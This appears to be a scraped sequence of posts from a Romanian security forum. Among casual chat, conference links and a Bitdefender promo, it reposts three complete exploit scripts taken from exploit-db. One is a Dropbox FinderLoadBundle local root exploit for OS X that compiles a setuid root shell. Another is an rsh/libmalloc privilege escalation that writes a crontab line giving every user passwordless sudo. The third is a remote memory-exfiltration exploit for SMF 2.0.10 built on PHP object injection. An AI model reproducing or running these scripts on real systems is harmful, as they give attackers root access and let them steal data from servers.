Nytro

[h=1]Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit[/h] #!/bin/bash # Exploit Title: Dropbox FinderLoadBundle OS X local root exploit # Google Dork: N/A # Date: 29/09/15 # Exploit Author: cenobyte # Vendor Homepage: https://www.dropbox.com # Software Link: N/A # Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.* # Tested on: OS X Yosemite (10.10.5) # CVE: N/A # # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # The setuid root FinderLoadBundle that was included in older DropboxHelperTools # versions for OS X allows loading of dynamically linked shared libraries # that are residing in the same directory. The directory in which # FinderLoadBundle is located is owned by root and that prevents placing # arbitrary files there. But creating a hard link from FinderLoadBundle to # somewhere in a directory in /tmp circumvents that protection thus making it # possible to load a shared library containing a payload which creates a root # shell. # # - vulnerable versions: | versions not vulnerable: # Dropbox 3.3.* for Mac | Dropbox 3.10.* for Mac # Dropbox 3.1.* for Mac | Dropbox 3.9.* for Mac # Dropbox 3.0.* for Mac | Dropbox 3.8.* for Mac # Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac # Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac # Dropbox 2.9.* for Mac | Dropbox 3.5.* for Mac # Dropbox 2.8.* for Mac | Dropbox 3.4.* for Mac # Dropbox 2.7.* for Mac | Dropbox 3.2.* for Mac # Dropbox 2.6.* for Mac | Dropbox 1.5.1-5 for Mac # Dropbox 2.5.* for Mac | Dropbox 1.4.* for Mac # Dropbox 2.4.* for Mac | Dropbox 1.3.* for Mac # Dropbox 2.3.* for Mac | # Dropbox 2.2.* for Mac | # Dropbox 2.1.* for Mac | # Dropbox 1.7.* for Mac | # Dropbox 1.6.* for Mac | # Dropbox 1.5.6 for Mac | # # The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*. # However, there is no mention of this issue at the Dropbox release notes: # https://www.dropbox.com/release_notes # # It seems that one of the fixes implemented in FinderLoadBundle is a # check whether the path of the bundle is a root owned directory making it # impossible to load arbitrary shared libraries as a non-privileged user. # # I am not sure how to find the exact version of the FinderLoadBundle executable # but the included Info.plist contained the following key: # <key>CFBundleShortVersionString</key> # This key is no longer present in the plist file of the latest version. So I # included a basic vulnerable version checker that checks for the presence of # this key. # # - exploit details: # I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features # used. This exploit relies on Xcode for the shared library + root shell to be # compiled. After successful exploitation a root shell is left in a directory in # /tmp so make sure you delete it on your own system when you are done testing. # # - example: # $ ./dropboxfinderloadbundle.sh # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # # [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3 # [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle # [-] constructing bundle # [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c # [-] compiling root shell # [-] executing FinderLoadBundle using root shell payload # [-] entering root shell # bash-3.2# id -P # root:********:0:0::0:0:System Administrator:/var/root:/bin/sh readonly __progname=$(basename $0) errx() { echo "$__progname: $@" >&2 exit 1 } main() { local -r tmp=$(head -10 /dev/urandom | md5) local -r helpertools="/Library/DropboxHelperTools" local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS" local -r bundletarget="$bundle/mach_inject_bundle_stub" local -r bundlesrc="${bundletarget}.c" local -r sh="/tmp/$tmp/boomsh" local -r shsrc="${sh}.c" local -r cfversion="CFBundleShortVersionString" local -r findbin="FinderLoadBundle" echo "Dropbox $findbin OS X local root exploit by cenobyte 2015" echo uname -v | grep -q ^Darwin || \ errx "this Dropbox exploit only works on OS X" [ ! -d "$helpertools" ] && \ errx "$helpertools does not exist" which -s gcc || \ errx "gcc not found" found=0 for finder in $(ls $helpertools/Dropbox_u*/$findbin); do stat -s "$finder" | grep -q "st_mode=0104" if [ $? -eq 0 ]; then found=1 break fi done [ $found -ne 1 ] && \ errx "couldn't find a setuid root $findbin" local -r finderdir=$(dirname $finder) local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist" [ -f "$plist" ] || \ errx "FinderLoadBundle not vulnerable (cannot open $plist)" grep -q "<key>$cfversion</key>" "$plist" || \ errx "FinderLoadBundle not vulnerable (plist missing $cfversion)" echo "[-] creating temporary directory: /tmp/$tmp" mkdir /tmp/$tmp || \ errx "couldn't create /tmp/$tmp" echo "[-] linking $finder" ln "$finder" "/tmp/$tmp/$findbin" || \ errx "ln $finder /tmp/$tmp/$findbin failed" echo "[-] constructing bundle" mkdir -p "$bundle" || \ errx "cannot create $bundle" echo "#include <sys/stat.h>" > "$bundlesrc" echo "#include <sys/types.h>" >> "$bundlesrc" echo "#include <stdlib.h>" >> "$bundlesrc" echo "#include <unistd.h>" >> "$bundlesrc" echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc" echo "void init(void)" >> "$bundlesrc" echo "{" >> "$bundlesrc" echo " setuid(0);" >> "$bundlesrc" echo " setgid(0);" >> "$bundlesrc" echo " chown(\"$sh\", 0, 0);" >> "$bundlesrc" echo " chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc" echo "}" >> "$bundlesrc" echo "[-] creating $shsrc" echo "#include <unistd.h>" > "$shsrc" echo "#include <stdio.h>" >> "$shsrc" echo "#include <stdlib.h>" >> "$shsrc" echo "int" >> "$shsrc" echo "main()" >> "$shsrc" echo "{" >> "$shsrc" echo " setuid(0);" >> "$shsrc" echo " setgid(0);" >> "$shsrc" echo " system(\"/bin/bash\");" >> "$shsrc" echo " return(0);" >> "$shsrc" echo "}" >> "$shsrc" echo "[-] compiling root shell" gcc "$shsrc" -o "$sh" || \ errx "gcc failed for $shsrc" gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \ errx "gcc failed for $bundlesrc" echo "[-] executing $findbin using root shell payload" cd "/tmp/$tmp" ./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null [ $? -ne 4 ] && \ errx "exploit failed, $findbin seems not vulnerable" [ ! -f "$sh" ] && \ errx "$sh was not created, exploit failed" stat -s "$sh" | grep -q "st_mode=0104" || \ errx "$sh was not set to setuid root, exploit failed" echo "[-] entering root shell" "$sh" } main "$@" exit 0 Sursa: https://www.exploit-db.com/exploits/38360/

[h=1]Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation[/h] # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root # tested on osx 10.9.5 / 10.10.5 # jul/2015 # by rebel import os,time,sys env = {} s = os.stat("/etc/sudoers").st_size env['MallocLogFile'] = '/etc/crontab' env['MallocStackLogging'] = 'yes' env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' sys.stderr.write("creating /etc/crontab..") p = os.fork() if p == 0: os.close(1) os.close(2) os.execve("/usr/bin/rsh",["rsh","localhost"],env) time.sleep(1) if "NOPASSWD" not in open("/etc/crontab").read(): sys.stderr.write("failed\n") sys.exit(-1) sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") while os.stat("/etc/sudoers").st_size == s: sys.stderr.write(".") time.sleep(1) sys.stderr.write("\ndone\n") os.system("sudo su") Sursa: https://www.exploit-db.com/exploits/38371/

Da, ne-am gandit si noi la o parte dintre ele, dar nu stiu cine ar avea timp de asa ceva...

Cine face cate un topic pentru fiecare (care nu exista deja)?

Le-am cautat si eu pe cele de la Defcon, dar nu le-am gasit. Recomand tuturor: "When IoT Attacks: Hacking A Linux-Powered Rifle"! E fun. Vrei root pe o arma? Vezi video.

Am vazut aseara doua dintre ele: 1. Red Team vs Blue Team - Trebuie vazut! 2. Bypass Control Flow Guard - Continut bun, prezentare de cacat. Engleza chinezului ala e mai prosta chiar si decat a mea.

Cum de au aparut asa repede? Sa le descarc, pana nu le sterg (nefiind uploadate de catre staff)?

[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h] #!/usr/bin/python# -*- coding: iso-8859-15 -*- ############################################################################# # Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit # Authors: Andrea Palazzo # <andrea [dot] palazzo [at] truel [dot] it> # Filippo Roncari # <filippo [dot] roncari [at] truel [dot] it> # Truel Lab ~ http://lab.truel.it # Requirements: SMF <= 2.0.10 # PHP <= 5.6.11 / 5.5.27 / 5.4.43 # Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt # TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt # TL-2015-SMF01 n/y/a # Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/ # Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs ############################################################################ import sys, requests, time, os, socket, thread, base64, string, urllib from multiprocessing import Process #Payload Config bytes_num = 000 #num of bytes to dump address = 000 #starting memory address #Target Config cookie = {'PHPSESSID' : '000'} #SMF session cookie target_host = 'http://localhost/smf/index.php' #URL of target installation index.php csrftoken = '' #Local Server Config host = "localhost" port = 31337 #Memory dump variables dumped = '' current_dump = '' in_string = False brute_index = 0 brute_list = list(string.ascii_letters + string.digits) r_ok = 'HTTP/1.0 200 OK' + '\n' r_re = 'HTTP/1.0 302 OK' + '\n' r_body = '''Server: Truel-Server Content-Type: text/xml Connection: keep-alive Content-Length: 395 <env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope"> <env:Header> <n:alertcontrol xmlns:n="http://example.org/alertcontrol"> <n:priority>1</n:priority> <n:expires>2001-06-22T14:00:00-05:00</n:expires> </n:alertcontrol> </env:Header> <env:Body> <m:alert xmlns:m="http://example.org/alert"> <m:msg>Truel</m:msg> </m:alert> </env:Body> </env:Envelope>''' def serverStart(): print "[+] Setting up local server on port " + str(port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if not sock: print "[X] Fatal Error: Unable to create socket" sock.bind((host, port)) sock.listen(1) return sock def getToken(): global csrftoken print "[+] Trying to get a valid CSRF token" for n in range(3): #3 attempts r = requests.get(target_host, cookies=cookie, allow_redirects=False) r = r.text if(r.find("action=logout;")!=-1): break start = r.find("action=logout;") if (start !=-1): end = (r[start+14:]).find('">') csrftoken = r[start+14 : start+end+14] print "[+] Authentication done. Got token " + str(csrftoken) return True else: print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID." return False def prepareForExploit(): if not(getToken()): #get CSRF token os._exit(1) target = target_host + '?action=suggest&' + csrftoken + '&search_param=test' r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request return def forgePayload(current_try, address): location = "http://" + current_try payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}' return payload def sendPayload(payload,null): target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens try: r = requests.get(target, cookies=cookie, allow_redirects=False) except requests.exceptions.RequestException: print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)" os._exit(1) return def limitReached(dumped): if(len(dumped) >= bytes_num): return True else: return False def printDumped(dumped): d = " " cnt = 1 print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host print "[+] ======================= Dumped Data =======================" for i in range(bytes_num): d = d + str(dumped[i]) if (cnt % 48 == 0): print d d = " " if (cnt == bytes_num): print d cnt = cnt + 1 def getSoapRequest(sock): connection, sender = sock.accept() request = connection.recv(8192) return (connection, request) def sendSoapResponse(connection, content): connection.send(content) connection.close() return def getDumpedFromHost(request): i = request.find("Host: ") + 6 v = request[i:i+1] return v def pushDumped(value, string): global dumped global current_dump global brute_index global address global in_string dumped = str(value) + str(dumped) if(string): current_dump = str(value) + str(current_dump) else: current_dump = "" in_string = string address = address-1 brute_index = 0 print "[" + hex(address) + "] " + str(value) return def bruteViaResponse(sock): global brute_index current_try = "" response_ok = r_ok + r_body for n in range(19): connection, request = getSoapRequest(sock) if not request: connection.close() return False if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True else: if((brute_index+1) == len(brute_list)): sendSoapResponse(connection,response_ok) return False brute_index = brute_index + 1 if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body sendSoapResponse(connection,response_re) connection, request = getSoapRequest(sock) if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True sendSoapResponse(connection,response_ok) return False def bruteViaRequest(sock): global brute_index brute_index = 0 current_try = "" while(True): if(brute_index == len(brute_list)): pushDumped(".", False) if limitReached(dumped): printDumped(dumped) return if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) payload = forgePayload(current_try,address) thread.start_new_thread(sendPayload,(payload,"")) if not bruteViaResponse(sock): brute_index = brute_index + 1 return def runExploit(): print "[+] Starting exploit" sock = serverStart() prepareForExploit() print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host) bruteViaRequest(sock) sock.close() print "[+] Bye ~ Truel Lab (http://lab.truel.it)" sys.exit(0) runExploit() Sursa: https://www.exploit-db.com/exploits/38304/

LinkOfDeath.com - when it will catch you it will kill you('r tab)

Lu ala cu vn5socks m-am plictisit de cate ori i-am dat ban si l-am lasat sa faca spam intr-un topic Edit: Le-am dat ban, dar parca vad peste 2-3 ore din nou posturi . Eh, cel putin ajuta la SEO. Cred.

BitDefender Internet Security 2016 – 6 luni licenta GRATUITA! By Radu FaraVirusi(com) on September 21, 2015 BitDefender a lansat gamei de produse BitDefender 2016, ce aduce cateva modificari notabile. Acum puteti avea licenta GRATUITA timp de 6 luni de zile pentru produsul BitDefender Internet Security 2016. A fost adaugata protectie impotriva programelor malitioase de tip ransomware (care blocheaza PC-ul si cer o rascumparare in bani pentru deblocare) – asigura un scut impotriva accesului aplicatiilor necunoscute la documentele personale. Motorul BitDefender a fost imbunatatit cu o tehnologie denumita “machine learning-based technologies”, permitandu-i sa detecteze amenintari noi mai repede ca niciodata. Firewall-ul a fost rescris si are o performanta imbunatatita. Au fost aduse modificari si modulelor password manager, control parental, criptarea fisierelor si utilitarelor anti furt. Pentru a obtine licenta GRATUITA accesati site-ul: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats. Sursa: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!

Sa ne spui si noua daca afli mai multe despre evenimentul de la CERT. O sa fie tehnic? Eu cred ca o sa fie de "informare generala". Cel de la Provision se poate descrie intr-un singur cuvant: SALES. Owasp o sa fie interesant.

Da, nu se merita. Nu e pentru noi.

9:2 A Sermon on Newton and Turing 9:3 Globalstar Satellite Communications 9:4 Keenly Spraying the Kernel Pools 9:5 The Second Underhanded Crypto Contest 9:6 Cross VM Communications 9:7 Antivirus Tumors 9:8 A Recipe for TCP/IPA 9:9 Mischief with AX.25 and APRS 9:10 Napravi i ti Ra?cunar „Galaksija“ 9:11 Root Rights are a Grrl’s Best Friend! 9:12 What If You Could Listen to This PDF? 9:13 Oona’s Puzzle Corner! Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf

Android 5.x Lockscreen Bypass (CVE-2015-3860) Posted on September 15, 2015 by jgor A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein. September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860) The attack requires the following criteria: Attacker must have physical access to the device User must have a password set (pattern / pin configurations do not appear to be exploitable) Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I): Sursa: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office

Ce va mai place sa comentati aiurea... Daca nu va intereseaza, nu postati. Ramaneti la McDonalds.

Da, e smechera dracia aia, web shell rapid

You are za best! Thanks!

Nu stiu daca s-a mai postat: Criza refugia?ilor e de fapt o invazie musulman? organizat? | NapocaNews

O sa fie si un workshop de web security: https://www.owasp.org/index.php/OWASP_EEE_Bucharest_Event_2015#tab=Agenda Daca sunteti interesati, sau aveti prieteni care lucreaza pe web, vi-l recomand.

Asta as vrea si eu sa inteleg. Ce as putea face cu un astfel de cont?

My first Defcon experience Defcon is a meta-conference which anyone passionate by IT security should attend. It is more than a conference, it is the heaven of hackers and security professionals, a place where definitely you will find something both cool and useful, even if you are interested in web security, reverse engineering, social engineering, hardware, lock-picking, Internet of Things or car-hacking topics. Articol: My first Defcon experience – Security Café Cate poze si pareri despre conferinta. Din pacate, nu am apucat sa vad tot ce era acolo. Sper sa ajung si la anul.

Lame.

Daca e adevarat, e doar un motiv in plus sa il folosesc. Oricum, din declaratiile lor, am inteles ca diverse firme de AV le foloseau semnaturile. Le furau. Deci mi s-ar parea o razbunare geniala.